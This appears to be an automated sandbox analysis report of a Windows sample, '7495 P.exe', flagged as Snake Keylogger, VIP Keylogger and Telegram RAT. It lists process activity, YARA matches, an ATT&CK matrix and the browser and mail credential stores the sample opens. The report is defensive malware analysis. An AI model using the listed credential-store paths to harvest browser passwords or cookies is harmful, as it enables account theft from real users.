Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Queries volume information: C:\Users\user\Desktop\7495 P.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Queries volume information: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Design\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Design.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Queries volume information: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\7495 P.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 0000000D.00000002.3730302031.0000000003281000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3730425071.0000000003111000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 2.2.7495 P.exe.47d0650.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.HRrXXnBIpL.exe.3e3de80.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.HRrXXnBIpL.exe.3e81ca0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.7495 P.exe.478c830.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.HRrXXnBIpL.exe.3e81ca0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.7495 P.exe.47d0650.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.HRrXXnBIpL.exe.3e3de80.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.7495 P.exe.478c830.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.3727170925.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1341717853.000000000478C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.1378937276.0000000003E3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 7495 P.exe PID: 5272, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 7495 P.exe PID: 8812, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HRrXXnBIpL.exe PID: 8888, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HRrXXnBIpL.exe PID: 9096, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 2.2.7495 P.exe.47d0650.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.HRrXXnBIpL.exe.3e3de80.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.HRrXXnBIpL.exe.3e81ca0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.7495 P.exe.478c830.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.HRrXXnBIpL.exe.3e81ca0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.7495 P.exe.47d0650.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.HRrXXnBIpL.exe.3e3de80.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.7495 P.exe.478c830.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.3727170925.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1341717853.000000000478C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.1378937276.0000000003E3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 7495 P.exe PID: 5272, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 7495 P.exe PID: 8812, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HRrXXnBIpL.exe PID: 8888, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\7495 P.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 18.2.HRrXXnBIpL.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.7495 P.exe.47d0650.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.HRrXXnBIpL.exe.3e3de80.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.7495 P.exe.478c830.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.HRrXXnBIpL.exe.3e81ca0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.HRrXXnBIpL.exe.3e81ca0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.7495 P.exe.47d0650.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.HRrXXnBIpL.exe.3e3de80.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.7495 P.exe.478c830.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000002.3727156029.000000000043E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1341717853.000000000478C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.1378937276.0000000003E3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 7495 P.exe PID: 5272, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 7495 P.exe PID: 8812, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HRrXXnBIpL.exe PID: 8888, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HRrXXnBIpL.exe PID: 9096, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 0000000D.00000002.3730302031.0000000003281000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3730425071.0000000003111000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 2.2.7495 P.exe.47d0650.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.HRrXXnBIpL.exe.3e3de80.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.HRrXXnBIpL.exe.3e81ca0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.7495 P.exe.478c830.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.HRrXXnBIpL.exe.3e81ca0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.7495 P.exe.47d0650.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.HRrXXnBIpL.exe.3e3de80.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.7495 P.exe.478c830.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.3727170925.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1341717853.000000000478C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.1378937276.0000000003E3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 7495 P.exe PID: 5272, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 7495 P.exe PID: 8812, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HRrXXnBIpL.exe PID: 8888, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HRrXXnBIpL.exe PID: 9096, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 2.2.7495 P.exe.47d0650.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.HRrXXnBIpL.exe.3e3de80.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.HRrXXnBIpL.exe.3e81ca0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.7495 P.exe.478c830.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.HRrXXnBIpL.exe.3e81ca0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.7495 P.exe.47d0650.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.HRrXXnBIpL.exe.3e3de80.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.7495 P.exe.478c830.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.3727170925.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1341717853.000000000478C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.1378937276.0000000003E3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 7495 P.exe PID: 5272, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 7495 P.exe PID: 8812, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HRrXXnBIpL.exe PID: 8888, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Scheduled Task/Job	11 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	13 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Scheduled Task/Job	3 Obfuscated Files or Information	Security Account Manager	11 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	31 Virtualization/Sandbox Evasion	SSH	Keylogging	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	24 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	31 Virtualization/Sandbox Evasion	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 7495 P.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
7495 P.exe